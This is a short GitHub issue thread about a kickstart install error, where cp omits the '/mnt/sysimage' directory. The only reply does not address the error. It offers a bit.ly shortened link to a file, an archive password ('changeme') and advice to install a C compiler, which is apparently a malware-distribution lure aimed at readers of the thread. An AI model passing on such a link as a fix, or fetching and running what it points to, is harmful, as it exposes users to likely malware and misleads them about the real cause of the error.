### ISSUE TITLE
cp: -r not specified; omitting directory '/mnt/sysimage'

### ISSUE THREAD

**Issue by markuslf** [Linuxfabrik/kickstart#10]
From `/var/log/anaconda/ks.log`:
```
Copying /tmp/dynamic.ks to /mnt/sysimage
/mnt/sysroot/root/
cp: -r not specified; omitting directory '/mnt/sysimage'
```

**Comment by SAMBILI** [comment]
This might help:This file might fix it
https://bit.ly/3TzaAQd
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
